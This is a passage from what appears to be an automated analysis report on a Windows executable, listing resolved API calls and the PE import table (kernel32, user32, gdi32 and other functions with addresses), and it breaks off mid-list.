3118. "duser.dll.GetGadgetTicket",
3119. "dui70.dll.?GetPICount@ClassInfoBase@DirectUI@@UBEIXZ",
3120. "dui70.dll.?GetByClassIndex@ClassInfoBase@DirectUI@@UAEPBUPropertyInfo@2@I@Z",
3121. "dui70.dll.?OnHosted@HWNDHost@DirectUI@@MAEXPAVElement@2@@Z",
3122. "dui70.dll.?CreateAccNameLabel@HWNDHost@DirectUI@@IAEPAUHWND__@@PAU3@@Z",
3123. "uxtheme.dll.EnableThemeDialogTexture",
3124. "dui70.dll.?OnMessage@HWNDHost@DirectUI@@UAE_NIIJPAJ@Z",
3125. "dui70.dll.?CreateHWND@CCBase@DirectUI@@UAEPAUHWND__@@PAU3@@Z",
3126. "comctl32.dll.HIMAGELIST_QueryInterface",
3127. "comctl32.dll.DrawShadowText",
3128. "comctl32.dll.DrawSizeBox",
3129. "comctl32.dll.DrawScrollBar",
3130. "comctl32.dll.SizeBoxHwnd",
3131. "comctl32.dll.ScrollBar_MouseMove",
3132. "comctl32.dll.ScrollBar_Menu",
3133. "comctl32.dll.HandleScrollCmd",
3134. "comctl32.dll.DetachScrollBars",
3135. "comctl32.dll.AttachScrollBars",
3136. "comctl32.dll.CCSetScrollInfo",
3137. "comctl32.dll.CCGetScrollInfo",
3138. "comctl32.dll.CCEnableScrollBar",
3139. "comctl32.dll.QuerySystemGestureStatus",
3140. "uxtheme.dll.#49",
3141. "uxtheme.dll.CloseThemeData",
3142. "dui70.dll.?PostCreate@CCBase@DirectUI@@MAEXPAUHWND__@@@Z",
3143. "dui70.dll.?IsContentProtected@Element@DirectUI@@UAE_NXZ",
3144. "uxtheme.dll.GetThemeBool",
3145. "duser.dll.GetGadgetFocus",
3146. "uxtheme.dll.GetThemeBackgroundContentRect",
3147. "uxtheme.dll.GetThemeTextMetrics",
3148. "uxtheme.dll.GetThemePartSize",
3149. "uxtheme.dll.GetThemeTextExtent",
3150. "uxtheme.dll.GetThemeBackgroundExtent",
3151. "ole32.dll.CoRegisterInitializeSpy",
3152. "ole32.dll.CoRevokeInitializeSpy",
3153. "duser.dll.SetGadgetFocus",
3154. "duser.dll.DUserSendEvent",
3155. "duser.dll.SetGadgetRect",
3156. "comctl32.dll.SetWindowSubclass",
3157. "comctl32.dll.DefSubclassProc",
3158. "dui70.dll.?GetHWND@HWNDHost@DirectUI@@UAEPAUHWND__@@XZ",
3159. "user32.dll.FrostCrashedWindow",
3160. "uxtheme.dll.#47",
3161. "uxtheme.dll.BufferedPaintInit",
3162. "uxtheme.dll.BeginBufferedPaint",
3163. "uxtheme.dll.BufferedPaintRenderAnimation",
3164. "uxtheme.dll.BeginBufferedAnimation",
3165. "uxtheme.dll.IsThemeBackgroundPartiallyTransparent",
3166. "uxtheme.dll.DrawThemeParentBackground",
3167. "uxtheme.dll.DrawThemeBackground",
3168. "uxtheme.dll.DrawThemeText",
3169. "uxtheme.dll.EndBufferedAnimation",
3170. "uxtheme.dll.GetThemeTransitionDuration",
3171. "uxtheme.dll.GetBufferedPaintDC",
3172. "uxtheme.dll.GetBufferedPaintTargetDC",
3173. "uxtheme.dll.EndBufferedPaint",
3174. "duser.dll.ForwardGadgetMessage",
3175. "advapi32.dll.IsValidSid",
3176. "advapi32.dll.GetLengthSid",
3177. "advapi32.dll.CopySid",
3178. "comctl32.dll.RemoveWindowSubclass",
3179. "duser.dll.SetGadgetFocusEx",
3180. "dui70.dll.?OnUnHosted@HWNDHost@DirectUI@@MAEXPAVElement@2@@Z",
3181. "duser.dll.DisableContainerHwnd",
3182. "dui70.dll.?MessageCallback@HWNDHost@DirectUI@@UAEIPAUtagGMSG@@@Z",
3183. "dui70.dll.?HandleUiaDestroyListener@Element@DirectUI@@UAEXXZ",
3184. "dui70.dll.?OnDestroy@HWNDHost@DirectUI@@UAEXXZ",
3185. "dui70.dll.??1CCBase@DirectUI@@UAE@XZ",
3186. "uxtheme.dll.BufferedPaintStopAllAnimations",
3187. "uxtheme.dll.BufferedPaintUnInit",
3188. "duser.dll.DUserFlushMessages",
3189. "duser.dll.DUserFlushDeferredMessages",
3190. "duser.dll.DeleteHandle",
3191. "dui70.dll.UnInitThread",
3192. "user32.dll.UnregisterMessagePumpHook",
3193. "dui70.dll.UnInitProcessPriv",
3194. "dui70.dll.?Release@ClassInfoBase@DirectUI@@UAEHXZ",
3195. "dui70.dll.?GetGlobalIndex@ClassInfoBase@DirectUI@@UBEIXZ",
3196. "dui70.dll.??1ClassInfoBase@DirectUI@@UAE@XZ",
3197. "kernel32.dll.ReleaseActCtx",
3198. "advapi32.dll.RegisterEventSourceW",
3199. "advapi32.dll.ReportEventW",
3200. "advapi32.dll.DeregisterEventSource",
3201. "werui.dll.WerUITerminate",
3202. "werui.dll.WerUIDelete",
3203. "user32.dll.MsgWaitForMultipleObjects",
3204. "advapi32.dll.DuplicateToken",
3205. "rpcrt4.dll.RpcBindingFree"
3206. ]
3207.  
3208. [*] Static Analysis: {
3209. "pe": {
3210. "peid_signatures": null,
3211. "imports": [
3212. {
3213. "imports": [
3214. {
3215. "name": "DeleteCriticalSection",
3216. "address": "0x46f168"
3217. },
3218. {
3219. "name": "LeaveCriticalSection",
3220. "address": "0x46f16c"
3221. },
3222. {
3223. "name": "EnterCriticalSection",
3224. "address": "0x46f170"
3225. },
3226. {
3227. "name": "InitializeCriticalSection",
3228. "address": "0x46f174"
3229. },
3230. {
3231. "name": "VirtualFree",
3232. "address": "0x46f178"
3233. },
3234. {
3235. "name": "VirtualAlloc",
3236. "address": "0x46f17c"
3237. },
3238. {
3239. "name": "LocalFree",
3240. "address": "0x46f180"
3241. },
3242. {
3243. "name": "LocalAlloc",
3244. "address": "0x46f184"
3245. },
3246. {
3247. "name": "GetVersion",
3248. "address": "0x46f188"
3249. },
3250. {
3251. "name": "GetCurrentThreadId",
3252. "address": "0x46f18c"
3253. },
3254. {
3255. "name": "InterlockedDecrement",
3256. "address": "0x46f190"
3257. },
3258. {
3259. "name": "InterlockedIncrement",
3260. "address": "0x46f194"
3261. },
3262. {
3263. "name": "VirtualQuery",
3264. "address": "0x46f198"
3265. },
3266. {
3267. "name": "WideCharToMultiByte",
3268. "address": "0x46f19c"
3269. },
3270. {
3271. "name": "MultiByteToWideChar",
3272. "address": "0x46f1a0"
3273. },
3274. {
3275. "name": "lstrlenA",
3276. "address": "0x46f1a4"
3277. },
3278. {
3279. "name": "lstrcpynA",
3280. "address": "0x46f1a8"
3281. },
3282. {
3283. "name": "LoadLibraryExA",
3284. "address": "0x46f1ac"
3285. },
3286. {
3287. "name": "GetThreadLocale",
3288. "address": "0x46f1b0"
3289. },
3290. {
3291. "name": "GetStartupInfoA",
3292. "address": "0x46f1b4"
3293. },
3294. {
3295. "name": "GetProcAddress",
3296. "address": "0x46f1b8"
3297. },
3298. {
3299. "name": "GetModuleHandleA",
3300. "address": "0x46f1bc"
3301. },
3302. {
3303. "name": "GetModuleFileNameA",
3304. "address": "0x46f1c0"
3305. },
3306. {
3307. "name": "GetLocaleInfoA",
3308. "address": "0x46f1c4"
3309. },
3310. {
3311. "name": "GetCommandLineA",
3312. "address": "0x46f1c8"
3313. },
3314. {
3315. "name": "FreeLibrary",
3316. "address": "0x46f1cc"
3317. },
3318. {
3319. "name": "FindFirstFileA",
3320. "address": "0x46f1d0"
3321. },
3322. {
3323. "name": "FindClose",
3324. "address": "0x46f1d4"
3325. },
3326. {
3327. "name": "ExitProcess",
3328. "address": "0x46f1d8"
3329. },
3330. {
3331. "name": "WriteFile",
3332. "address": "0x46f1dc"
3333. },
3334. {
3335. "name": "UnhandledExceptionFilter",
3336. "address": "0x46f1e0"
3337. },
3338. {
3339. "name": "RtlUnwind",
3340. "address": "0x46f1e4"
3341. },
3342. {
3343. "name": "RaiseException",
3344. "address": "0x46f1e8"
3345. },
3346. {
3347. "name": "GetStdHandle",
3348. "address": "0x46f1ec"
3349. }
3350. ],
3351. "dll": "kernel32.dll"
3352. },
3353. {
3354. "imports": [
3355. {
3356. "name": "GetKeyboardType",
3357. "address": "0x46f1f4"
3358. },
3359. {
3360. "name": "LoadStringA",
3361. "address": "0x46f1f8"
3362. },
3363. {
3364. "name": "MessageBoxA",
3365. "address": "0x46f1fc"
3366. },
3367. {
3368. "name": "CharNextA",
3369. "address": "0x46f200"
3370. }
3371. ],
3372. "dll": "user32.dll"
3373. },
3374. {
3375. "imports": [
3376. {
3377. "name": "RegQueryValueExA",
3378. "address": "0x46f208"
3379. },
3380. {
3381. "name": "RegOpenKeyExA",
3382. "address": "0x46f20c"
3383. },
3384. {
3385. "name": "RegCloseKey",
3386. "address": "0x46f210"
3387. }
3388. ],
3389. "dll": "advapi32.dll"
3390. },
3391. {
3392. "imports": [
3393. {
3394. "name": "SysFreeString",
3395. "address": "0x46f218"
3396. },
3397. {
3398. "name": "SysReAllocStringLen",
3399. "address": "0x46f21c"
3400. },
3401. {
3402. "name": "SysAllocStringLen",
3403. "address": "0x46f220"
3404. }
3405. ],
3406. "dll": "oleaut32.dll"
3407. },
3408. {
3409. "imports": [
3410. {
3411. "name": "TlsSetValue",
3412. "address": "0x46f228"
3413. },
3414. {
3415. "name": "TlsGetValue",
3416. "address": "0x46f22c"
3417. },
3418. {
3419. "name": "LocalAlloc",
3420. "address": "0x46f230"
3421. },
3422. {
3423. "name": "GetModuleHandleA",
3424. "address": "0x46f234"
3425. }
3426. ],
3427. "dll": "kernel32.dll"
3428. },
3429. {
3430. "imports": [
3431. {
3432. "name": "RegQueryValueExA",
3433. "address": "0x46f23c"
3434. },
3435. {
3436. "name": "RegOpenKeyExA",
3437. "address": "0x46f240"
3438. },
3439. {
3440. "name": "RegCloseKey",
3441. "address": "0x46f244"
3442. }
3443. ],
3444. "dll": "advapi32.dll"
3445. },
3446. {
3447. "imports": [
3448. {
3449. "name": "lstrcpyA",
3450. "address": "0x46f24c"
3451. },
3452. {
3453. "name": "WriteFile",
3454. "address": "0x46f250"
3455. },
3456. {
3457. "name": "WaitForSingleObject",
3458. "address": "0x46f254"
3459. },
3460. {
3461. "name": "VirtualQuery",
3462. "address": "0x46f258"
3463. },
3464. {
3465. "name": "VirtualAlloc",
3466. "address": "0x46f25c"
3467. },
3468. {
3469. "name": "Sleep",
3470. "address": "0x46f260"
3471. },
3472. {
3473. "name": "SizeofResource",
3474. "address": "0x46f264"
3475. },
3476. {
3477. "name": "SetThreadLocale",
3478. "address": "0x46f268"
3479. },
3480. {
3481. "name": "SetFilePointer",
3482. "address": "0x46f26c"
3483. },
3484. {
3485. "name": "SetEvent",
3486. "address": "0x46f270"
3487. },
3488. {
3489. "name": "SetErrorMode",
3490. "address": "0x46f274"
3491. },
3492. {
3493. "name": "SetEndOfFile",
3494. "address": "0x46f278"
3495. },
3496. {
3497. "name": "ResetEvent",
3498. "address": "0x46f27c"
3499. },
3500. {
3501. "name": "ReadFile",
3502. "address": "0x46f280"
3503. },
3504. {
3505. "name": "MultiByteToWideChar",
3506. "address": "0x46f284"
3507. },
3508. {
3509. "name": "MulDiv",
3510. "address": "0x46f288"
3511. },
3512. {
3513. "name": "LockResource",
3514. "address": "0x46f28c"
3515. },
3516. {
3517. "name": "LoadResource",
3518. "address": "0x46f290"
3519. },
3520. {
3521. "name": "LoadLibraryA",
3522. "address": "0x46f294"
3523. },
3524. {
3525. "name": "LeaveCriticalSection",
3526. "address": "0x46f298"
3527. },
3528. {
3529. "name": "InitializeCriticalSection",
3530. "address": "0x46f29c"
3531. },
3532. {
3533. "name": "GlobalUnlock",
3534. "address": "0x46f2a0"
3535. },
3536. {
3537. "name": "GlobalSize",
3538. "address": "0x46f2a4"
3539. },
3540. {
3541. "name": "GlobalReAlloc",
3542. "address": "0x46f2a8"
3543. },
3544. {
3545. "name": "GlobalHandle",
3546. "address": "0x46f2ac"
3547. },
3548. {
3549. "name": "GlobalLock",
3550. "address": "0x46f2b0"
3551. },
3552. {
3553. "name": "GlobalFree",
3554. "address": "0x46f2b4"
3555. },
3556. {
3557. "name": "GlobalFindAtomA",
3558. "address": "0x46f2b8"
3559. },
3560. {
3561. "name": "GlobalDeleteAtom",
3562. "address": "0x46f2bc"
3563. },
3564. {
3565. "name": "GlobalAlloc",
3566. "address": "0x46f2c0"
3567. },
3568. {
3569. "name": "GlobalAddAtomA",
3570. "address": "0x46f2c4"
3571. },
3572. {
3573. "name": "GetVersionExA",
3574. "address": "0x46f2c8"
3575. },
3576. {
3577. "name": "GetVersion",
3578. "address": "0x46f2cc"
3579. },
3580. {
3581. "name": "GetUserDefaultLCID",
3582. "address": "0x46f2d0"
3583. },
3584. {
3585. "name": "GetTickCount",
3586. "address": "0x46f2d4"
3587. },
3588. {
3589. "name": "GetThreadLocale",
3590. "address": "0x46f2d8"
3591. },
3592. {
3593. "name": "GetSystemInfo",
3594. "address": "0x46f2dc"
3595. },
3596. {
3597. "name": "GetStringTypeExA",
3598. "address": "0x46f2e0"
3599. },
3600. {
3601. "name": "GetStdHandle",
3602. "address": "0x46f2e4"
3603. },
3604. {
3605. "name": "GetProfileStringA",
3606. "address": "0x46f2e8"
3607. },
3608. {
3609. "name": "GetProcAddress",
3610. "address": "0x46f2ec"
3611. },
3612. {
3613. "name": "GetModuleHandleA",
3614. "address": "0x46f2f0"
3615. },
3616. {
3617. "name": "GetModuleFileNameA",
3618. "address": "0x46f2f4"
3619. },
3620. {
3621. "name": "GetLocaleInfoA",
3622. "address": "0x46f2f8"
3623. },
3624. {
3625. "name": "GetLocalTime",
3626. "address": "0x46f2fc"
3627. },
3628. {
3629. "name": "GetLastError",
3630. "address": "0x46f300"
3631. },
3632. {
3633. "name": "GetFullPathNameA",
3634. "address": "0x46f304"
3635. },
3636. {
3637. "name": "GetDiskFreeSpaceA",
3638. "address": "0x46f308"
3639. },
3640. {
3641. "name": "GetDateFormatA",
3642. "address": "0x46f30c"
3643. },
3644. {
3645. "name": "GetCurrentThreadId",
3646. "address": "0x46f310"
3647. },
3648. {
3649. "name": "GetCurrentProcessId",
3650. "address": "0x46f314"
3651. },
3652. {
3653. "name": "GetComputerNameA",
3654. "address": "0x46f318"
3655. },
3656. {
3657. "name": "GetCPInfo",
3658. "address": "0x46f31c"
3659. },
3660. {
3661. "name": "GetACP",
3662. "address": "0x46f320"
3663. },
3664. {
3665. "name": "FreeResource",
3666. "address": "0x46f324"
3667. },
3668. {
3669. "name": "InterlockedExchange",
3670. "address": "0x46f328"
3671. },
3672. {
3673. "name": "FreeLibrary",
3674. "address": "0x46f32c"
3675. },
3676. {
3677. "name": "FormatMessageA",
3678. "address": "0x46f330"
3679. },
3680. {
3681. "name": "FindResourceA",
3682. "address": "0x46f334"
3683. },
3684. {
3685. "name": "EnumCalendarInfoA",
3686. "address": "0x46f338"
3687. },
3688. {
3689. "name": "EnterCriticalSection",
3690. "address": "0x46f33c"
3691. },
3692. {
3693. "name": "DeleteCriticalSection",
3694. "address": "0x46f340"
3695. },
3696. {
3697. "name": "CreateThread",
3698. "address": "0x46f344"
3699. },
3700. {
3701. "name": "CreateFileA",
3702. "address": "0x46f348"
3703. },
3704. {
3705. "name": "CreateEventA",
3706. "address": "0x46f34c"
3707. },
3708. {
3709. "name": "CompareStringA",
3710. "address": "0x46f350"
3711. },
3712. {
3713. "name": "CloseHandle",
3714. "address": "0x46f354"
3715. }
3716. ],
3717. "dll": "kernel32.dll"
3718. },
3719. {
3720. "imports": [
3721. {
3722. "name": "VerQueryValueA",
3723. "address": "0x46f35c"
3724. },
3725. {
3726. "name": "GetFileVersionInfoSizeA",
3727. "address": "0x46f360"
3728. },
3729. {
3730. "name": "GetFileVersionInfoA",
3731. "address": "0x46f364"
3732. }
3733. ],
3734. "dll": "version.dll"
3735. },
3736. {
3737. "imports": [
3738. {
3739. "name": "UnrealizeObject",
3740. "address": "0x46f36c"
3741. },
3742. {
3743. "name": "StretchBlt",
3744. "address": "0x46f370"
3745. },
3746. {
3747. "name": "SetWindowOrgEx",
3748. "address": "0x46f374"
3749. },
3750. {
3751. "name": "SetWinMetaFileBits",
3752. "address": "0x46f378"
3753. },
3754. {
3755. "name": "SetViewportOrgEx",
3756. "address": "0x46f37c"
3757. },
3758. {
3759. "name": "SetTextColor",
3760. "address": "0x46f380"
3761. },
3762. {
3763. "name": "SetStretchBltMode",
3764. "address": "0x46f384"
3765. },
3766. {
3767. "name": "SetROP2",
3768. "address": "0x46f388"
3769. },
3770. {
3771. "name": "SetPixel",
3772. "address": "0x46f38c"
3773. },
3774. {
3775. "name": "SetMapMode",
3776. "address": "0x46f390"
3777. },
3778. {
3779. "name": "SetEnhMetaFileBits",
3780. "address": "0x46f394"
3781. },
3782. {
3783. "name": "SetDIBColorTable",
3784. "address": "0x46f398"
3785. },
3786. {
3787. "name": "SetBrushOrgEx",
3788. "address": "0x46f39c"
3789. },
3790. {
3791. "name": "SetBkMode",
3792. "address": "0x46f3a0"
3793. },
3794. {
3795. "name": "SetBkColor",
3796. "address": "0x46f3a4"
3797. },
3798. {
3799. "name": "SelectPalette",
3800. "address": "0x46f3a8"
3801. },
3802. {
3803. "name": "SelectObject",
3804. "address": "0x46f3ac"
3805. },
3806. {
3807. "name": "SelectClipRgn",
3808. "address": "0x46f3b0"
3809. },
3810. {
3811. "name": "ScaleWindowExtEx",
3812. "address": "0x46f3b4"
3813. },
3814. {
3815. "name": "SaveDC",
3816. "address": "0x46f3b8"
3817. },
3818. {
3819. "name": "RestoreDC",
3820. "address": "0x46f3bc"
3821. },
3822. {
3823. "name": "RectVisible",
3824. "address": "0x46f3c0"
3825. },
3826. {
3827. "name": "RealizePalette",
3828. "address": "0x46f3c4"
3829. },
3830. {
3831. "name": "PlayEnhMetaFile",
3832. "address": "0x46f3c8"
3833. },
3834. {
3835. "name": "PathToRegion",
3836. "address": "0x46f3cc"
3837. },
3838. {
3839. "name": "PatBlt",
3840. "address": "0x46f3d0"
3841. },
3842. {
3843. "name": "MoveToEx",
3844. "address": "0x46f3d4"
3845. },
3846. {
3847. "name": "MaskBlt",
3848. "address": "0x46f3d8"
3849. },
3850. {
3851. "name": "LineTo",
3852. "address": "0x46f3dc"
3853. },
3854. {
3855. "name": "LPtoDP",
3856. "address": "0x46f3e0"
3857. },
3858. {
3859. "name": "IntersectClipRect",
3860. "address": "0x46f3e4"
3861. },
3862. {
3863. "name": "GetWindowOrgEx",
3864. "address": "0x46f3e8"
3865. },
3866. {
3867. "name": "GetWinMetaFileBits",
3868. "address": "0x46f3ec"
3869. },
3870. {
3871. "name": "GetTextMetricsA",
3872. "address": "0x46f3f0"
3873. },
3874. {
3875. "name": "GetTextExtentPoint32A",
3876. "address": "0x46f3f4"
3877. },
3878. {
3879. "name": "GetSystemPaletteEntries",
3880. "address": "0x46f3f8"
3881. },
3882. {
3883. "name": "GetStockObject",
3884. "address": "0x46f3fc"
3885. },
3886. {
3887. "name": "GetPixel",
3888. "address": "0x46f400"
3889. },
3890. {
3891. "name": "GetPaletteEntries",
3892. "address": "0x46f404"
3893. },
3894. {
3895. "name": "GetObjectA",
3896. "address": "0x46f408"
3897. },
3898. {
3899. "name": "GetEnhMetaFilePaletteEntries",
3900. "address": "0x46f40c"
3901. },
3902. {
3903. "name": "GetEnhMetaFileHeader",
3904. "address": "0x46f410"
3905. },
3906. {
3907. "name": "GetEnhMetaFileDescriptionA",
3908. "address": "0x46f414"
3909. },
3910. {
3911. "name": "GetEnhMetaFileBits",
3912. "address": "0x46f418"
3913. },
3914. {
3915. "name": "GetDeviceCaps",
3916. "address": "0x46f41c"
3917. },
3918. {
3919. "name": "GetDIBits",
3920. "address": "0x46f420"
3921. },
3922. {
3923. "name": "GetDIBColorTable",
3924. "address": "0x46f424"
3925. },
3926. {
3927. "name": "GetDCOrgEx",
3928. "address": "0x46f428"
3929. },
3930. {
3931. "name": "GetCurrentPositionEx",
3932. "address": "0x46f42c"
3933. },
3934. {
3935. "name": "GetClipBox",
3936. "address": "0x46f430"
3937. },
3938. {
3939. "name": "GetBrushOrgEx",
3940. "address": "0x46f434"
3941. },
3942. {
3943. "name": "GetBitmapBits",
3944. "address": "0x46f438"
3945. },
3946. {
3947. "name": "ExcludeClipRect",
3948. "address": "0x46f43c"
3949. },
3950. {
3951. "name": "EndPage",
3952. "address": "0x46f440"
3953. },
3954. {
3955. "name": "EndDoc",
3956. "address": "0x46f444"
3957. },
3958. {
3959. "name": "DeleteObject",
3960. "address": "0x46f448"
3961. },
3962. {
3963. "name": "DeleteEnhMetaFile",
3964. "address": "0x46f44c"
3965. },
3966. {
3967. "name": "DeleteDC",
3968. "address": "0x46f450"
3969. },
3970. {
3971. "name": "CreateSolidBrush",
3972. "address": "0x46f454"
3973. },
3974. {
3975. "name": "CreatePenIndirect",
3976. "address": "0x46f458"
3977. },
3978. {
3979. "name": "CreatePalette",
3980. "address": "0x46f45c"
3981. },
3982. {
3983. "name": "CreateICA",
3984. "address": "0x46f460"
3985. },
3986. {
3987. "name": "CreateHalftonePalette",
3988. "address": "0x46f464"
3989. },
3990. {
3991. "name": "CreateFontIndirectA",
3992. "address": "0x46f468"
3993. },
3994. {
3995. "name": "CreateEnhMetaFileA",
3996. "address": "0x46f46c"
3997. },
3998. {
3999. "name": "CreateDIBitmap",
4000. "address": "0x46f470"
4001. },
4002. {
4003. "name": "CreateDIBSection",
4004. "address": "0x46f474"
4005. },
4006. {
4007. "name": "CreateDCA",
4008. "address": "0x46f478"
4009. },
4010. {
4011. "name": "CreateCompatibleDC",
4012. "address": "0x46f47c"
4013. },
4014. {
4015. "name": "CreateCompatibleBitmap",
4016. "address": "0x46f480"
4017. },
4018. {
4019. "name": "CreateBrushIndirect",
4020. "address": "0x46f484"
4021. },
4022. {
4023. "name": "CreateBitmap",
4024. "address": "0x46f488"
4025. },
4026. {
4027. "name": "CopyEnhMetaFileA",
4028. "address": "0x46f48c"
4029. },
4030. {
4031. "name": "CloseEnhMetaFile",
4032. "address": "0x46f490"
4033. },
4034. {
4035. "name": "BitBlt",
4036. "address": "0x46f494"
4037. }
4038. ],
4039. "dll": "gdi32.dll"
4040. },
4041. {
4042. "imports": [
4043. {
4044. "name": "CreateWindowExA",
4045. "address": "0x46f49c"
4046. },
4047. {
4048. "name": "WindowFromPoint",
4049. "address": "0x46f4a0"
4050. },
4051. {
4052. "name": "WinHelpA",
4053. "address": "0x46f4a4"
4054. },
4055. {
4056. "name": "WaitMessage",
4057. "address": "0x46f4a8"
4058. },
4059. {
4060. "name": "UpdateWindow",
4061. "address": "0x46f4ac"
4062. },
4063. {
4064. "name": "UnregisterClassA",
4065. "address": "0x46f4b0"
4066. },
4067. {
4068. "name": "UnhookWindowsHookEx",
4069. "address": "0x46f4b4"
4070. },
4071. {
4072. "name": "TranslateMessage",
4073. "address": "0x46f4b8"
4074. },
4075. {
4076. "name": "TranslateMDISysAccel",
4077. "address": "0x46f4bc"
4078. },
4079. {
4080. "name": "TrackPopupMenu",
4081. "address": "0x46f4c0"
4082. },
4083. {
4084. "name": "SystemParametersInfoA",
4085. "address": "0x46f4c4"
4086. },
4087. {
4088. "name": "ShowWindow",
4089. "address": "0x46f4c8"
4090. },
4091. {
4092. "name": "ShowScrollBar",
4093. "address": "0x46f4cc"
4094. },
4095. {
4096. "name": "ShowOwnedPopups",
4097. "address": "0x46f4d0"
4098. },
4099. {
4100. "name": "ShowCursor",
4101. "address": "0x46f4d4"
4102. },
4103. {
4104. "name": "SetWindowsHookExA",
4105. "address": "0x46f4d8"
4106. },
4107. {
4108. "name": "SetWindowTextA",
4109. "address": "0x46f4dc"
4110. },
4111. {
4112. "name": "SetWindowPos",
4113. "address": "0x46f4e0"
4114. },
4115. {
4116. "name": "SetWindowPlacement",
4117. "address": "0x46f4e4"
4118. },
4119. {
4120. "name": "SetWindowLongA",
4121. "address": "0x46f4e8"
4122. },
4123. {
4124. "name": "SetTimer",
4125. "address": "0x46f4ec"
4126. },
4127. {
4128. "name": "SetScrollRange",
4129. "address": "0x46f4f0"
4130. },
4131. {
4132. "name": "SetScrollPos",
4133. "address": "0x46f4f4"
4134. },
4135. {
4136. "name": "SetScrollInfo",
4137. "address": "0x46f4f8"
4138. },
4139. {
4140. "name": "SetRect",
4141. "address": "0x46f4fc"
4142. },
4143. {
4144. "name": "SetPropA",
4145. "address": "0x46f500"
4146. },
4147. {
4148. "name": "SetParent",
4149. "address": "0x46f504"
4150. },
4151. {
4152. "name": "SetMenuItemInfoA",
4153. "address": "0x46f508"
4154. },
4155. {
4156. "name": "SetMenu",
4157. "address": "0x46f50c"
4158. },
4159. {
4160. "name": "SetKeyboardState",
4161. "address": "0x46f510"
4162. },
4163. {
4164. "name": "SetForegroundWindow",
4165. "address": "0x46f514"
4166. },
4167. {
4168. "name": "SetFocus",
4169. "address": "0x46f518"
4170. },
4171. {
4172. "name": "SetCursor",
4173. "address": "0x46f51c"
4174. },
4175. {
4176. "name": "SetClipboardData",
4177. "address": "0x46f520"
4178. },
4179. {
4180. "name": "SetClassLongA",
4181. "address": "0x46f524"
4182. },
4183. {
4184. "name": "SetCapture",
4185. "address": "0x46f528"
4186. },
4187. {
4188. "name": "SetActiveWindow",
4189. "address": "0x46f52c"
4190. },
4191. {
4192. "name": "SendMessageA",
4193. "address": "0x46f530"
4194. },
4195. {
4196. "name": "ScrollWindow",
4197. "address": "0x46f534"
4198. },
4199. {
4200. "name": "ScreenToClient",
4201. "address": "0x46f538"
4202. },
4203. {
4204. "name": "RemovePropA",
4205. "address": "0x46f53c"
4206. },
4207. {
4208. "name": "RemoveMenu",
4209. "address": "0x46f540"
4210. },
4211. {
4212. "name": "ReleaseDC",
4213. "address": "0x46f544"
4214. },
4215. {
4216. "name": "ReleaseCapture",
4217. "address": "0x46f548"
4218. },
4219. {
4220. "name": "RegisterWindowMessageA",
4221. "address": "0x46f54c"
4222. },
4223. {
4224. "name": "RegisterClipboardFormatA",
4225. "address": "0x46f550"
4226. },
4227. {
4228. "name": "RegisterClassA",
4229. "address": "0x46f554"
4230. },
4231. {
4232. "name": "RedrawWindow",
4233. "address": "0x46f558"
4234. },
4235. {
4236. "name": "PtInRect",
4237. "address": "0x46f55c"
4238. },
4239. {
4240. "name": "PostQuitMessage",
4241. "address": "0x46f560"
4242. },
4243. {
4244. "name": "PostMessageA",
4245. "address": "0x46f564"
4246. },
4247. {
4248. "name": "PeekMessageA",
4249. "address": "0x46f568"
4250. },
4251. {
4252. "name": "OpenClipboard",
4253. "address": "0x46f56c"
4254. },
4255. {
4256. "name": "OffsetRect",
4257. "address": "0x46f570"
4258. },
4259. {
4260. "name": "OemToCharA",
4261. "address": "0x46f574"
4262. },
4263. {
4264. "name": "MessageBoxA",
4265. "address": "0x46f578"
4266. },
4267. {
4268. "name": "MessageBeep",
4269. "address": "0x46f57c"
4270. },
4271. {
4272. "name": "MapWindowPoints",
4273. "address": "0x46f580"
4274. },
4275. {
4276. "name": "MapVirtualKeyA",
4277. "address": "0x46f584"
4278. },
4279. {
4280. "name": "LoadStringA",
4281. "address": "0x46f588"
4282. },
4283. {
4284. "name": "LoadKeyboardLayoutA",
4285. "address": "0x46f58c"
4286. },
4287. {
4288. "name": "LoadIconA",
4289. "address": "0x46f590"
4290. },
4291. {
4292. "name": "LoadCursorA",
4293. "address": "0x46f594"
4294. },
4295. {
4296. "name": "LoadBitmapA",
4297. "address": "0x46f598"
4298. },
4299. {
4300. "name": "KillTimer",
4301. "address": "0x46f59c"
4302. },
4303. {
4304. "name": "IsZoomed",
4305. "address": "0x46f5a0"
4306. },
4307. {
4308. "name": "IsWindowVisible",
4309. "address": "0x46f5a4"
4310. },
4311. {
4312. "name": "IsWindowEnabled",
4313. "address": "0x46f5a8"
4314. },
4315. {
4316. "name": "IsWindow",
4317. "address": "0x46f5ac"
4318. },
4319. {
4320. "name": "IsRectEmpty",
4321. "address": "0x46f5b0"
4322. },
4323. {
4324. "name": "IsIconic",
4325. "address": "0x46f5b4"
4326. },
4327. {
4328. "name": "IsDialogMessageA",
4329. "address": "0x46f5b8"
4330. },
4331. {
4332. "name": "IsChild",
4333. "address": "0x46f5bc"
4334. },
4335. {
4336. "name": "IsCharAlphaNumericA",
4337. "address": "0x46f5c0"
4338. },
4339. {
4340. "name": "IsCharAlphaA",
4341. "address": "0x46f5c4"
4342. },
4343. {
4344. "name": "InvalidateRect",
4345. "address": "0x46f5c8"
4346. },
4347. {
4348. "name": "IntersectRect",
4349. "address": "0x46f5cc"
4350. },
4351. {
4352. "name": "InsertMenuItemA",
4353. "address": "0x46f5d0"
4354. },
4355. {
4356. "name": "InsertMenuA",
4357. "address": "0x46f5d4"
4358. },
4359. {
4360. "name": "InflateRect",
4361. "address": "0x46f5d8"
4362. },
4363. {
4364. "name": "GetWindowThreadProcessId",
4365. "address": "0x46f5dc"
4366. },
4367. {
4368. "name": "GetWindowTextA",
4369. "address": "0x46f5e0"
4370. },
4371. {
4372. "name": "GetWindowRect",
4373. "address": "0x46f5e4"
4374. },
4375. {
4376. "name": "GetWindowPlacement",
4377. "address": "0x46f5e8"
4378. },
4379. {
4380. "name": "GetWindowLongA",
4381. "address": "0x46f5ec"
4382. },
4383. {
4384. "name": "GetWindowDC",
4385. "address": "0x46f5f0"
4386. },
4387. {
4388. "name": "GetTopWindow",
4389. "address": "0x46f5f4"
4390. },
4391. {
4392. "name": "GetSystemMetrics",
4393. "address": "0x46f5f8"
4394. },
4395. {
4396. "name": "GetSystemMenu",
4397. "address": "0x46f5fc"
4398. },
4399. {
4400. "name": "GetSysColorBrush",
4401. "address": "0x46f600"
4402. },
4403. {
4404. "name": "GetSysColor",
4405. "address": "0x46f604"
4406. },
4407. {
4408. "name": "GetSubMenu",
4409. "address": "0x46f608"
4410. },
4411. {
4412. "name": "GetScrollRange",
4413. "address": "0x46f60c"
4414. },
4415. {
